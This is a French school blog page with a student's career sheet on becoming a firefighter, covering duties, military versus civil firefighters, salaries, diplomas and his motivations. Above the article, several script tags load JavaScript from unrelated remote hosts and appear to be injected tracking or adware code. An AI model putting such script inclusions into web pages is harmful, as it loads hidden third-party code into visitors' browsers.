•  

    <script src="//tracksmall.com/2279d81d48c75df8ff.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8825x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8825x&format=arrjs&r=1603699535523" type="text/javascript"></script> <script src="http://tracksmall.com/ext/2279d81d48c75df8ff.js?sid=52659_8825_&title=aa&blocks[]=31af2" type="text/javascript"></script>

    Lire la suite...


    votre commentaire
  • FICHE MÉTIER

     

    Réalisez un article sur le métier choisi, puis le coller dans le blog et l’illustrer avec des images et des vidéos.

    NOM de l’élève : DROMBRY BONNAFOUX Maxence

     

    Métier choisi : Sapeur-pompier

     

    Pourquoi j’ai choisi ce métier ? J’ai choisi ce métier car c’est ma passion, je veut faire ça depuis tout petit et j’adore me rendre utile pour les personnes j’aime aussi l’esprit militaire et aussi l’esprit d’équipe.

     

    En quoi consiste le métier ? Ce métier est un service d’urgence il intervient en cas d’incendie, d’assistance à une victime, accident … Dans ce métier il y a plusieurs postes comme expert (chimique, pilotage de drone, robot…), médecin, pharmacien, vétérinaire, infirmier…


    Le sapeur-pompier intervient sur des sinistres et des accidents variés. Dans tous les cas, le maniement du matériel d’incendie est évidemment de rigueur, de même que les gestes des premiers soins, sur place ou en ambulance.

     

    Les missions des pompiers, difficiles et pénibles, présentent des risques importants. La fréquence et la nature de leurs interventions, les stratégies d’action et de prévention les obligent à utiliser des moyens différents selon les zones à protéger : mer, montagne, sites industriels à haut risque chimique ou nucléaire, grands centres urbains, petites communes…

     

    À Paris et dans les départements limitrophes (Hauts-de-Seine, Val-de-Marne, Seine-Saint-Denis) ainsi qu'à Marseille, les pompiers sont des militaires. Sur le reste du territoire, ce sont des pompiers civils qui dépendent des collectivités locales et relèvent du ministère de l’Intérieur.

     

    Les pompiers militaires travaillent soit pour la Brigade des sapeurs-pompiers de Paris (BSPP, dépendant de l'armée de terre), soit pour le Bataillon des marins-pompiers de Marseille (BMPM, dépendant de la Marine nationale). Ils peuvent être affectés dans les unités d’instruction et d’intervention de la sécurité civile et dans le groupement des moyens aériens de la sécurité civile.

     

    Parmi les pompiers civils, on distingue les professionnels et les volontaires, de loin les plus nombreux. Les professionnels sont des fonctionnaires territoriaux, tandis que les volontaires remplissent leur mission tout en exerçant leur propre métier en parallèle.

     

    Qu'ils soient professionnels ou militaires, les sapeurs-pompiers sont astreints à un service de 24h ou de 48h d’affilée pour pouvoir intervenir à tout moment. Cette permanence est compensée par un système de repos.

     

    Le mode de vie des sapeurs-pompiers professionnels et celui des militaires sont voisins (casernement, hiérarchie, grades…). Les pompiers volontaires, de leur côté, doivent organiser leur vie afin de pouvoir se libérer immédiatement en cas d’alerte. Ils participent aux entraînements et aux tours de garde.

     

    Avantages : Pour moi les avantage dans ce métier c’est que on travaille tout le temps en équipe et ce métier n’est jamais le même car cela dépends des interventions...

     

    Inconvénients : Pour moi il y a qu’un seul inconvénient c’est que quand il y a une garde de nuit et que l’on est entrains de dormir on est obligé de se réveiller rapidement pour partir.

     

    Salaires : Il y a plusieurs salaire cela dépend du grade que l’on a cela varie du grade Sapeurs-pompiers deuxième classe jusqu’à Contrôleur Général (1539€ ---} 4 554,82 €).

     

    Études et diplômes : Pour rentrer chez les sapeurs-pompiers comme il y a différents grade et corps de métier, en fonction des études et des diplômes les grade sont accessibles…

    Pour commencer on peut rentrer chez les sapeurs-pompiers à partir de 16 ans donc le diplôme minimum est le brevet des collèges ( mais celui-ci ne pourra pas dépasser les grade au dessus des homme du rang (2 eme classe/1 ere classe/ caporal et caporal-chef))

    Après pour être plus haut garder on besoin minimum d’un bac+2 pour le concours externe lieutenant/ bac+3 pour concours externe capitaine pour les grades encore pus haut ou les spécialité il faut bac+5 minimum.

     

    Débouchés : On ne peut pas vraiment savoir cela dépend des disponibilités des casernes et des grades rechercher.

     

    Qualités requises : Il faut être discipliné , sérieux, sportif, avoir un bon esprit d’équipe et être solide psychologiquement.

     

    Quelles qualités est-ce que je pense avoir pour exercer ce métier ? Je pense que je suis sportif, sérieux, et j’ai aussi un bon esprit d’équipe.


    votre commentaire


    Suivre le flux RSS des articles de cette rubrique
    Suivre le flux RSS des commentaires de cette rubrique